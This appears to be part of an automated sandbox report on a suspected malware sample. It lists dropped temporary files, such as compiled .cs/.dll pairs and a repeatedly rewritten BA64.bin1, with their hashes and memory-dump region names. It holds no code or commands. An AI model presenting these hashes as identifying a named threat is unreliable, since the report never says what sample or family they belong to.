SHA512 91f3a72daf17605f73e974541640102ec08ebd4ac9953c84cd6b368096a71768ed7a733287641b829cdfb520b100d8cbc6bddbd72b54b32be33f0ff8a54f2940

C:\Users\Admin\AppData\Local\Temp\RESF666.tmp

MD5 d70cef3451ab127975248b30db57fea2
SHA1 fde119de2890d1e0daecd635ac8c4b908e45c8ad
SHA256 488ccc13eadfed7d4023d9c1e5f3c8f4ce55f88d268632e8d52612c23965586d
SHA512 876cf97a89ff44781fe47f99121dc372e5fcc120f3a9a4cc32a550934bafe20efe7dd539c4142ed9bfc9710f42d5ea4ad5cef8bdec1d49d5ead62ec0ed482956

C:\Users\Admin\AppData\Local\Temp\c35dm5m1\c35dm5m1.dll

MD5 ae93569b76b6f7195348268fb504b4c7
SHA1 9cf5e0854eba9f26bded3f9ef9392514dcbab18a
SHA256 d688e35da4b5df389fbb4943ac33ec878ff682a2176735acfdce7fa7eafb1e05
SHA512 92c26da273d3793d13a166322f327349443d96a6b0f320009cdee97304891c4ac3ae263174b03dc6260b27e1b63a0886f2f9cd47e0518ceef14cc3dde274358d

memory/2916-150-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\nujw4rst\nujw4rst.cmdline

MD5 66a263050a1730b124ae1871b5b51d74
SHA1 a5ce671036c5787ac8c97aa84b0994d9ff3776c4
SHA256 68588bfab5b405e99101d818148327c7c6cba6caa50215ef1ecc3769a6a7ed6b
SHA512 9cba05a4104518871493a1443cc5685fcad19aa2b330b5bcd3e27483b034552be6cf8f6c1573bb8e362ff2c9e4b6a7d8e37da4614752e85ca22a1f92c9e296ad

\??\c:\Users\Admin\AppData\Local\Temp\nujw4rst\nujw4rst.0.cs

MD5 aca9704199c51fde14b8bf8165bc2a4c
SHA1 789b408ccad29240bd093515cbd19a199ad2c1c8
SHA256 cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27
SHA512 a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

memory/3572-153-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\nujw4rst\CSCA36D566C37834C179A172717BBA0DA71.TMP

MD5 3d6564256dba26d9c46e8af92f7c59a7
SHA1 5c10f11a8d51d60d45708bf5f87e5d16cea54729
SHA256 957837e52370d7b4d034b67ff27ca35c6757acdda42ad361fb550f749490ce12
SHA512 e6b4d15c405d2a75454032ac17a98d5d7136aa3f0dccf461f88f05ab6b68fd9563508c3b9d12a7a6eb25028eafaca95fd21d7054921f91b4aacc1968b66fe3e4

C:\Users\Admin\AppData\Local\Temp\RESF750.tmp

MD5 c7ee93e4bfb23e67e73bae21571531d6
SHA1 8e1c5d2701c9e93dbe1f0c6618418f23e715cc04
SHA256 10b955e3992bf8d46d478a83aeeea7556d39b7eb7f566685a65bc51db586b7f9
SHA512 5c75b64572bf0efbad91f526316fd87d069193b1e556225c903573eefa516840623cd3f3b3ad2c71a3353fa2db3f67d1a9944e8ab627e9e092a5e863dd0ae411

C:\Users\Admin\AppData\Local\Temp\nujw4rst\nujw4rst.dll

MD5 bc884681819d59ed858e7a1fc27fee76
SHA1 80fa630b948a97047a84cac8a73e8018d933058e
SHA256 3007cb8bdd1d62ec0dd81899c66f95c45ca06d67584899f3b45f8447ee014cc8
SHA512 b7a516e9cab108085000cf354e7758707931056710c75331e033e61218839151dc7939ff5ebba57b638a37c47c9c5efa33ea6a3f1c91d0685fa9f7b9fbf15311

memory/1436-157-0x000001DF88AF0000-0x000001DF895B1000-memory.dmp

memory/1436-158-0x000001DFA1E80000-0x000001DFA1EBD000-memory.dmp

memory/3524-159-0x000001CBA90B0000-0x000001CBA9153000-memory.dmp

memory/60-161-0x0000000007EA0000-0x0000000007F43000-memory.dmp

memory/1768-162-0x000001B342370000-0x000001B342413000-memory.dmp

memory/3812-160-0x000001729AD70000-0x000001729AE13000-memory.dmp

memory/4660-163-0x0000013AA7B10000-0x0000013AA7BB3000-memory.dmp

memory/1468-164-0x0000000000000000-mapping.dmp

memory/3584-165-0x0000000000000000-mapping.dmp

memory/2840-166-0x0000000000000000-mapping.dmp

memory/2944-167-0x0000000000000000-mapping.dmp

memory/3584-168-0x00000000001A6B20-0x00000000001A6B24-memory.dmp

memory/3584-169-0x00000000015C0000-0x0000000001656000-memory.dmp

memory/60-170-0x000000000AAC0000-0x000000000ABFB000-memory.dmp

memory/4436-174-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 f7aea2435aa888b709ca20f816c33bfd
SHA1 38717c9a73b5f8bd399839cbe0aa57518427e758
SHA256 f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5
SHA512 1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232

memory/4272-176-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/4256-178-0x0000000000000000-mapping.dmp

memory/60-179-0x000000000AE00000-0x000000000AF3A000-memory.dmp

memory/344-183-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 81e5279cdc4dd4b735bcf24c01a7bb2f
SHA1 32fc813ad8788d890f42465871c6018a27d13f69
SHA256 6d9f6f7f714b3212d395a23bd90c415b7557f77fa6639deba983694f262fa80e
SHA512 b3ff8ee16285da55f77fb6ee3054b912c9b7bd713d38df31e84d590214a1f38e470b7c49cfde21739cfaf51d74aaa06b7e744c332d25102f26fb6625c814989b

memory/4248-185-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 81e5279cdc4dd4b735bcf24c01a7bb2f
SHA1 32fc813ad8788d890f42465871c6018a27d13f69
SHA256 6d9f6f7f714b3212d395a23bd90c415b7557f77fa6639deba983694f262fa80e
SHA512 b3ff8ee16285da55f77fb6ee3054b912c9b7bd713d38df31e84d590214a1f38e470b7c49cfde21739cfaf51d74aaa06b7e744c332d25102f26fb6625c814989b

memory/4528-187-0x0000000000000000-mapping.dmp

memory/60-188-0x0000000007EA0000-0x0000000007F43000-memory.dmp

memory/3504-189-0x0000000000000000-mapping.dmp

memory/3968-190-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 20ec779e4e952197cd7d3634340a64df
SHA1 729b0b13b11bc040082008582de505943fb519ff
SHA256 10b32a3a7ba8816ed97396117d85ac54fede545e026518591ce9e47daabbed20
SHA512 7d95d9ad80c3a3432a5af688e73d909baf2ad888b56bc12cdd5c47facf8b5907701abb2ed4c8190a8874f3e2fde90e0c838cf84e64c0d21bdc3df84bdf41b5ce

memory/2740-192-0x0000000000000000-mapping.dmp

memory/2800-193-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 c49baf7b191e35153f2547e04eb9fc34
SHA1 876ced4f080a4d74bc31237d265595bfafa689a3
SHA256 725e4d5534b71c115d7b807f0ac7410780a1e6baf6730a8d2995ed7ba7b33bfe
SHA512 ec22771c6f092dc3b654fad2e3a0134c95922860f194b38878becff27ca708ffe41c1a1df59f2f8778cfd5e08d8b4450f5ece3f698686fc37b25545801e14b96

memory/4220-195-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 c49baf7b191e35153f2547e04eb9fc34
SHA1 876ced4f080a4d74bc31237d265595bfafa689a3
SHA256 725e4d5534b71c115d7b807f0ac7410780a1e6baf6730a8d2995ed7ba7b33bfe
SHA512 ec22771c6f092dc3b654fad2e3a0134c95922860f194b38878becff27ca708ffe41c1a1df59f2f8778cfd5e08d8b4450f5ece3f698686fc37b25545801e14b96

memory/4072-197-0x0000000000000000-mapping.dmp

memory/2616-198-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 2538afc623fe1500ea552c9737eccabc
SHA1 8b713505e5e71eb5a032c75a22ea5b5758f56c2c
SHA256 fd29e1458bdde94aaf6efb141a29b4fabe6467811c4b99bcba8c79d02e9c5534
SHA512 3930cdc12394de23481f17c2dd25e9d531f3791a674af884a168c2e7ce5223295ad3eab0b240b10689c970f5f0924a915aef7f89822a312f3804b6765c408c71

memory/4968-200-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 34e778c892b92665a4d409a248d457b6
SHA1 a11ced873ea5272bca350c311a30426514c5db2d
SHA256 50a509935381e2cc64b235e3083285fd6410d1106c117f388b76a26afb901634
SHA512 ec9e4bb8f4fa58466af1f88b464c5b8660776ef7f99aa58b0f6eee5181167f1de6aba49bc6ace1e24ac34bc536d2f121524fc81e719ae6c1688cb4936caeccb3

memory/4776-202-0x0000000000000000-mapping.dmp

memory/368-203-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 188dd26def821b97b964aa5b2e272d8f
SHA1 385171700fd4b10a84ec82e6adeeb04b40e89cf0
SHA256 793271214cb58ff61d8165d2d0b3db1a0d2b9436866b46525f46478f74dc61a2
SHA512 3b851ca2925b2017808af930096769538634120612237a0e191ec254a32c9803e14505dc728cf54a39842acf41728f62ed9d206ed5739d42b85b8edf5bec3d31

memory/1808-205-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 188dd26def821b97b964aa5b2e272d8f
SHA1 385171700fd4b10a84ec82e6adeeb04b40e89cf0
SHA256 793271214cb58ff61d8165d2d0b3db1a0d2b9436866b46525f46478f74dc61a2
SHA512 3b851ca2925b2017808af930096769538634120612237a0e191ec254a32c9803e14505dc728cf54a39842acf41728f62ed9d206ed5739d42b85b8edf5bec3d31

memory/2484-207-0x0000000000000000-mapping.dmp

memory/3800-208-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 8ce44843ae5914e2603ecb50fcff59b4
SHA1 3a6345d9566cc174526e7d020d1fa1ff8ac15c3c
SHA256 fd4ac27dff473a9e653bc7bbc84b18df090aa273c1f3dd2df4d54eb3b3b84dfd
SHA512 048870ef115f646580ae68b920d998e59d0ff3ec59a7f84ee167c5314185687fa526524d0b936c40a38b40645c97f42188e699a1bf7368852b3bb2ee4d5395be

memory/1016-210-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 8ce44843ae5914e2603ecb50fcff59b4
SHA1 3a6345d9566cc174526e7d020d1fa1ff8ac15c3c
SHA256 fd4ac27dff473a9e653bc7bbc84b18df090aa273c1f3dd2df4d54eb3b3b84dfd
SHA512 048870ef115f646580ae68b920d998e59d0ff3ec59a7f84ee167c5314185687fa526524d0b936c40a38b40645c97f42188e699a1bf7368852b3bb2ee4d5395be

memory/484-212-0x0000000000000000-mapping.dmp

memory/700-213-0x0000000000000000-mapping.dmp

memory/3620-214-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 756f9aa8d75fee36e04299538a327de3
SHA1 911b62a984eb4c4190032a0148c11a24a52b56f9
SHA256 870c7543adc861eae31c474069d2d6d675e21d4c44ec309ec59f530f85286bb4
SHA512 fe3e855a82c3151e0ced9ae7f48747c462bbf7477d7a9b72a814de602c4db910b7c964ed3ce8c11ab5ac8ec6fa89df2fb0e9da889b126c2c4144d97ac9873964

memory/4168-216-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 756f9aa8d75fee36e04299538a327de3
SHA1 911b62a984eb4c4190032a0148c11a24a52b56f9
SHA256 870c7543adc861eae31c474069d2d6d675e21d4c44ec309ec59f530f85286bb4
SHA512 fe3e855a82c3151e0ced9ae7f48747c462bbf7477d7a9b72a814de602c4db910b7c964ed3ce8c11ab5ac8ec6fa89df2fb0e9da889b126c2c4144d97ac9873964

memory/2380-218-0x0000000000000000-mapping.dmp

memory/4772-219-0x0000000000000000-mapping.dmp

memory/3196-220-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 5683e4c5651bbe4e85f320aa8263cccc
SHA1 23cc43ab8666c3db6c020a2469ad854224fe0e43
SHA256 9e4d2a8b5c57d9aad2e9ba9f9d49d2400e122cfdebe92b453d48acc4246651e9
SHA512 c7d026d873638b97262445a6d02d91c58673f0c97c029d80e4255fe961f02f04b801adf5e1fdb60ef914cf8bc8a339cbbe1cc01c6ab9b6e00223b58480f5149f

memory/2428-222-0x0000000000000000-mapping.dmp

memory/1108-223-0x0000000000000000-mapping.dmp

memory/4624-224-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 7e9b3b34ec9630f8cb76351e7f0a3e94
SHA1 31ee51742956b7e6a4bc6102332afb5f89e0badf
SHA256 4632bf2a753cd858029a524ddd0ec3a7dc9935c1b7bce81dee3eb781e1aa3091
SHA512 0ca1acea89380f81a200fd8702572887efbd684cb55b8c35343083b13fd0044c908d7f674e0d024a53b4f61be8c00fa93891ab638c81d3c1dafeed8efeb26102

memory/2172-226-0x0000000000000000-mapping.dmp

memory/224-227-0x0000000000000000-mapping.dmp

memory/1932-228-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 ab5ad908b9a63b1f754a9f541f63ab92
SHA1 0d241c8e8cab134e28fec06e57ee6d9886aac4cc
SHA256 4a586dd458d25210bbe2e370a231e9a314fb05a7032d71531b2c74fc0c3eeac8
SHA512 15d4d87ac03a8f45c67c10f09ae0652260f4781047e43fa37d52a3366b60423527ba50c0b25dd637696ec7f00eead1de69f87733478c6520cd7b9c0c02475ebd

memory/1540-230-0x0000000000000000-mapping.dmp

memory/3184-231-0x0000000000000000-mapping.dmp

memory/3080-232-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 09ecf16c7381965a345043970bfe3fe4
SHA1 51cf1ea3f6d351d31f00c3d29dde9905ff862cdb
SHA256 11abb64b97b1df51ee65f0d08db7bdcaa9bbd61766b110aa897aa0b388b93673
SHA512 61181616d66b8fc0aa5bac747a6934686515071606799e92ba0e9a90a409f024ba6fac5edaf91bc5466fc5c138374df6c38b9e85f777f405ed2c8bb0f228f07b

C:\Users\Admin\AppData\Local\Temp\BA64.bin

MD5 09ecf16c7381965a345043970bfe3fe4
SHA1 51cf1ea3f6d351d31f00c3d29dde9905ff862cdb
SHA256 11abb64b97b1df51ee65f0d08db7bdcaa9bbd61766b110aa897aa0b388b93673
SHA512 61181616d66b8fc0aa5bac747a6934686515071606799e92ba0e9a90a409f024ba6fac5edaf91bc5466fc5c138374df6c38b9e85f777f405ed2c8bb0f228f07b